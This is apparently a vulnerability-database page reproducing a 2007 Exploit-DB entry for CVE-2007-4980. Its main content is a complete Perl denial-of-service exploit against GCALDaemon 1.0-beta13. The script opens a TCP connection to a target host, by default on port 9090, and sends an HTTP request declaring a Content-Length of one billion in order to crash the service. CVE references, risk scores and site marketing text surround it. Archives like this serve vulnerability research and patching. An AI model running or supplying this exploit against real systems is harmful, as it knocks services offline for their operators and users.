Lucene search
+L

GCALDaemon 1.0-beta13 - Remote Denial of Service

🗓️ 16 Oct 2007 00:00:00Reported by ikkiType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 33 Views

GCALDaemon 1.0-beta13 - Remote Denial of Service exploi

Related
Code
ReporterTitlePublishedViews
Family
cve
CVE
CVE-2007-4980
19 Sep 200718:00
cve
cvelist
Cvelist
CVE-2007-4980
19 Sep 200718:00
cvelist
euvd
EUVD
EUVD-2007-4961
7 Oct 202500:30
euvd
nvd
NVD
CVE-2007-4980
19 Sep 200718:17
nvd
prion
Prion
Design/Logic Flaw
19 Sep 200718:17
prion
#!/usr/bin/perl
# /*
#  * GCALDaemon <= 1.0-beta13 Remote DoS
#  *
#  * Original Advisory:
#  * https://www.securityfocus.com/bid/25704/info
#  * http://www.ikkisoft.com/stuff/SN-2007-01.txt
#  *
#  *  Luca "ikki" Carettoni
#  *  http://www.ikkisoft.com
#  */

use strict;
use warnings;
use IO::Socket;

my $host = shift || die "Usage: $0 host [port]\n";
my $port = shift || 9090;
my $sock = new IO::Socket::INET(PeerAddr => $host, PeerPort => $port,
PeerProto => 'tcp')
or die "error: $!\n";
print "GCALDaemom DoS Expoit\n";
print "Just 4 seconds...\n";
sleep 4;
$sock->send("GET / HTTP/1.1\r\n");
$sock->send("Content-Length: 1000000000\r\n\r\n");
$sock->close;
print "\n\nNo more sync!\n";

# milw0rm.com [2007-10-16]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

25 Oct 2016 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 24.3
EPSS0.04759
33